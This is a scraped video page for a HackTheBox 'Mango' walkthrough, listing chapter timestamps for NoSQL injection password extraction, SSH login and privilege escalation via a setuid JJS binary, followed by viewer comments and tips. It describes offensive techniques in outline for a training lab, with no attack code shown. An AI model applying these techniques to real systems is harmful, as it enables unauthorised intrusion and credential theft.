HackTheBox - Mango
Рет қаралды 39,199
4 жыл бұрын01:00 - Start of nmap and examining the HTTPS Certificate to get a potential hostname
04:00 - Doing light testing on the HTTPS Site for SQL Injection, then sending to SQLMap. Using --force-ssl to make SQLMAP do HTTPS instead of HTTP
06:26 - Playing with analytics.php and some light testing to see if we could do SSRF. Put it on the backburner and move on.
07:42 - Testing the logon prompt on the HTTP Site, playing with SQL Injection and starting another SQLMap
08:51 - Going over NoSQL Injection
09:44 - Attempting to explain NoSQL Injection
11:35 - Performing a NoSQL Injection test via x-www-form-encoded data
12:44 - Doing Regular Expressions with NoSQL Injection to extract the password length
14:00 - Explaining how you would have done NoSQL Injection on NodeJS (Sending objects in JSON)
16:00 - Logging into the webserver via NoSQL Injection, running GoBuster with our cookie that is logged in
18:50 - Going back to NoSQL Injection with RegularExpression and Boolean injection to extract the password
19:20 - Going over doing Burp Intruder to extract data
21:45 - Creating a Python Script to do this NoSQL Injection since Burp cost $$ and is slow.
37:11 - Script mostly done extracting admin's password
40:47 - Trying to extract Mango's password but there's a tricky character, troubleshooting
44:00 - Screwed up a loop and didn't go through all the character space. Getting Mango's password using SSH to login to the box.
46:00 - Running LinPEAS and seeing JJS is a SetUID Bin
48:00 - Turns out we can't execute JJS as mango, only admin. Use "su" to switch to admin and run JJS
50:11 - Using JJS to write a file and drop an SSH Key
@kiriappeee 4 жыл бұрын
I actually found myself clapping at the privilege escalation at the end. Don't ever stop what you are doing IppSec. It's amazing educational content.
@xxanonymous6578 2 жыл бұрын
The minute I saw SQLmap in the preview I knew it was gonna be a good one. Thanks for the video Mr.Ippsec.
@yannickpeter8607 4 жыл бұрын
For me the regex part was pure magic. I went full ScriptKiddy and used a working script back in the day i solved the box but never really understood what it does until now. Was waiting for that video for so long. Thank you Sir!
@MKVD 4 жыл бұрын
Same lol, feels wrong that it was so easy with the script :D
@4kwah 4 жыл бұрын
I am wondering from where you got that script?
@manwuzi 4 жыл бұрын
Watching this in 1.75x is like watching a thriller...you're amazing ippsec
@ulissemini5492 4 жыл бұрын
21:35 you scared me there for a second
@CodeXND 4 жыл бұрын
and at /.ssh
@silverstar9644 4 жыл бұрын
Woah i was thinking about analytics.php all the time Great Video
@danilas2206 4 жыл бұрын
Awesome! It's really cool! Thx for writeup!
@j3r3miasmg Жыл бұрын
Two cents: 1 - string.printable 2 - for loops in python has an else condition that is called if a break is not called
@Guysudai1 4 жыл бұрын
About the for loop: I usually do ```for i in range(ord("!"), ord("~") + 1)``` so it's clearer what's going on and I'm not missing any ascii characters :P
@henrikbjerrenielsen4125 4 жыл бұрын
a small hint: use jss with the -scripting argument then you can use $EXEC() tnx for a great video!
@bloodline211 4 жыл бұрын
How exactly do you find how if its running a mongoDB in the backend other than just looking at the mangos and thinking 'mango, mongo hmmm..' - cuz in a real life situation you'd need to somehow find out whats in the backend.
@medoangel8370 4 жыл бұрын
Through nmap that's the first thing he did
@csmole1231 3 жыл бұрын
@@medoangel8370 ? but but the nmap said the http-title is mango, still the fruit, not the database...(did i miss anything?) (not to mention http-title can be edited by web dev i guess? they can say for example "banana protocol" but that doesn't mean it's really following banana protocol) (weird example i made but you get the idea :D)
@csmole1231 3 жыл бұрын
@@medoangel8370 i was deceived at first as well! then got so confused why ippsec know it's a mongodb hence nosql but still using sql injection😂loooool
@csmole1231 3 жыл бұрын
i checked the htb forum they all say stuff like "the name of the box is a big hint"🤪 idk maybe in real life you just try both...?🤣
@kydo2540 3 жыл бұрын
So I didn't catch the hint that this was supposed to lead me to mangoDB, how can I identify this in the future without a hint? Just trial and error?
@4kwah 4 жыл бұрын
This is great, I am already stuck working on the machine now 😀
@Haxr-dq6wt 3 жыл бұрын
So now we have the machine name and the pics of the mango that indicates that the server is using Mongo-DB In real life scenario, how would you discover that the site is using No-Sql DB and how would you discover that there is sql injection in it???
@arvin4348 3 жыл бұрын
amazing bro nice job man
@YOUNES-ep8vs 4 жыл бұрын
love you bro !!
@allurbase 4 жыл бұрын
:facepalm: I somehow found github/MangoDevelopers and went down a rabbit hole from there, scrapping webpages and trying to build a keywords dictionary with mango related words. kill me now.
@adrien8768 4 жыл бұрын
I love this vidéos
@nonope449 4 жыл бұрын
Python has a strings module that has useful subsets of the ASCII characters
@notargb 4 жыл бұрын
Hi ^^, I'm wondering: Why do you use "$ nmap -sC -sV" instead of "$ nmap -A"? Greetings, and thank you a lot for your content.
@deepanshpahwa5530 4 жыл бұрын
I guess -sC -sV is faster than doing -A
@lumenknotty6355 Жыл бұрын
Thank you!
@monzerabas2433 4 жыл бұрын
U are the best
@nicoswd 4 жыл бұрын
import re; re.escape(str) should also do the trick instead of manually escaping special regex characters
@steps0x029a 2 жыл бұрын
Nice hint, thanks! I found that an asterisk character as part of the password leads to false positive matches. Has anyone found a solution for that?
@westernvibes1267 4 жыл бұрын
Ipp, is pentesterlab good for learning web exploitations? Or is there any other good resources. Am pretty weak on web stuffs thinking to practice some more advanced stuffs..like chaining exploits together and waf evasion stuffs.
@zackadzky2265 2 жыл бұрын
i like your cut G
@lazarvukasinovic4878 4 жыл бұрын
which desktop environment are you using ?
@cantfinddave 4 жыл бұрын
When you add an IP, host and alias to etc/hosts, why do you do that? I tried googling but cant find an answer. It only explains how to do it.
@Thrawen 4 жыл бұрын
Some http servers have "virtual host routing" essentially that means it will serve you different resources based on the "Host" header in the request. In this case it did not serve the page with the ip as hostname but it did with the hostname found in the ssl cert. by adding it to /etc/hosts you can easily just send a request with that host header. alternatively you could just manipulate the header in burp but that will get annoying fast.
@cantfinddave 4 жыл бұрын
Awesome thank you
@mikeefpv 4 жыл бұрын
nice
@aminhatami3928 4 жыл бұрын
Tnk u.
@4kwah 4 жыл бұрын
I am wondering why the machine is still listed under Active machines at this moment!
@shubhamgurav634 4 жыл бұрын
You can work on that machine for 2 days after retirement
@4kwah 4 жыл бұрын
Shubham Gurav thanks for clarification!
@mohammadabdussamad2258 4 жыл бұрын
@@shubhamgurav634 two days? I thought it will be until the next box gets retired
@evildead7845 4 жыл бұрын
Hey Everyone, Can you tell me blog sites like medium(12:40) for hacking/pentesting purpose ofc?
@Splixy 4 жыл бұрын
What keyboard are you using?
@michaelyadidya8742 4 жыл бұрын
when are you releasing your own box on htb? 😎😎😎
@awscloudsecurity 4 жыл бұрын
Hi @IppSec, Thank You for this Awesome Script for extracting MongoDB Data. Could you please comment here on how to learn / which modules are essential for a Penetration Tester in Python in learning the Python Script Automation like this. I am waiting for your valuable response.
@sakettestsakettest8009 4 жыл бұрын
Was easy box,but was bit of ctf like at the login time.
@kushalrahatkar4568 3 жыл бұрын
can you please explain me what he did at the login? how did he find out what to do their?
@cimihan4816 4 жыл бұрын
hy how do you copy text or smth in tmux??
@zacksargent 4 жыл бұрын
superuser.com/questions/196060/selecting-text-in-tmux-copy-mode
@cimihan4816 3 жыл бұрын
@Kanchho Chhoro a hora XD
@BlackHermit 4 жыл бұрын
re.escape!
@aharonmo4188 4 жыл бұрын
:)
@humanflybzzz4568 4 жыл бұрын
Yeah Python did not work for me, had to write a bash script :) as always, It's a great learning exp. to see pros do it after you've stumbled around like a drunken a**hole.
@raffaeleriddle 4 жыл бұрын
They should allow new subscribers to pentest also retired machines..
@ippsec 4 жыл бұрын
Then people would just keep creating accounts, it's only ~10 for a month of full access.
@raffaeleriddle 4 жыл бұрын
@@ippsec Then they should allow everyone to pentest retired machines, just with no credit, only for academic and practical purposes , It'd be a profitable learning method. Thanks for answering btw.
@youssefbenyahia9448 4 жыл бұрын
August left Chris in America. Can you get the flag and reunite them? a crypto challenge in hackthebox plzzz help me
@spacenomad5484 3 жыл бұрын
21:15 Is mongodb regex broken? .* matches any amount of characters, including zero, as shown by egrep and sed: $ echo -n "admin" | egrep -o "admin.*" | sed -e 's/admin.*/still_a_match/g' So why does mongodb not match? Even egrep and sed agree, which is rare for me. Also, if some regex magician reads this... Why do I need to escape every damn "control character" in sed? echo -n "adminn" | sed -e 's/^ad\(mi[n]\+\)$/\1/g'
@lawaace1056 3 жыл бұрын
Cmon man hahahaha , you are a legend , seeing you disappoints me as a noob lol
@k5tggiv6ubmmb3as9 4 жыл бұрын
first
David Bombal
Рет қаралды 51 М.